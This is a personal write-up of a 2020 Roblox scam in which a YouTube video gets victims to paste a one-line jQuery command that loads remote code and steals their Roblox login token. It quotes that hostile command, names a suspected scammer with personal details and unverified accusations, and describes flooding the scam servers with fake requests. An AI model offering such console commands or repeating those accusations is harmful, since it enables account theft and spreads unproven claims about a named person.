On January 28th, 2020, I decided to visit the Roblox.com
website, to check up on things a bit. I saw that I was sent a message
by a Roblox friend, asking me a harmless question.

hi dude
i'm making a game and I wanna put your roblox character into it
could you upload your roblox char texture as a decal and send the link to me
here's a tutorial on how to do it if you don't already know:

They linked me to a Youtube tutorial, and I was instantly suspicious
of a scam. On the Youtube video, I was prompted to run javascript
in my browser.

$.get('//rblx.link')

"rblx.link" runs remote code from a third party website.
That code gets your Roblox authentication key and sends it to their
server, and then sends you to the profile texture as expected.

When I clicked on my friends profile, they were wearing red and blue
Roblox clothes, and the description was changed to:

Ask your parents to vote for Trump this year!
#MAGA2020

After studying how the fraud works for a few days, I came up with a clear
explaination of how it works:

When an account is hacked, their robux is stolen, and account is filled with
Trump propoganda. They the system messages all their friends, sending the same 
message, therefore, the number of hacked accounts grows exponentially.

The domain they use is "rblx.link". I tracked the hosting providor to
DigitalOcean, and they quickly removed it, breaking the entire system.

That lasted seven hours.

After their host was down, they quickly relocated
to a lesser-known Netherlands based host and changed the description of the
video to a new port on the same site. 
I then returned by reporting the abusive website to the new host.

The actual video itself seemed of no value as it was a scam tutorial, but they actually
blantanly give out their username and the amount of Robux they currently own ($2.8k worth). 
Visiting his profile, "jordy240797", he gives us his name, "Jordy", his age, 22, and where he lives,
the Netherlands.

There was existing research done on this person,
exposing messages that show that he is a sexual predator, and scammer and
has a history of stealing other people's work and labeling it as their own.

There may or may not be a connection between their location and their choice in hosting
providers. They chose DigitalOcean, then Clouvider Limited. As Clouvider limited is a Netherlandic
based hosting service, they could easily be connnected.

The video could also be faked, but the connection is still strong.

After searching more, I figured out it wasn't just one site, but many. There
are even tutorials on Youtube showing you how to set it up, and showing
me behind the scenes on how it works.

In an effort to try and slow down the efficiency of their systems, I wrote
a script to generate fake requests and send them to these server. This
will confuse the real and fake requests, therefore drastically slowing down the 
breaking-into-accounts process.

I found a few servers to spam, and proceeded to send hundreds, and sometimes thousands
of fake requests to them.


Resources:
https://twitter.com/JordyRBX/with_replies?lang=en
https://murder-mystery-2.fandom.com/wiki/Jordy240797
https://www.roblox.com/users/6104912/profile
https://docs.google.com/document/u/1/d/19GpwqJCRxm7S3_J8mCqMFxmTynIEEGY8c5w5YvLP8aQ/mobilebasic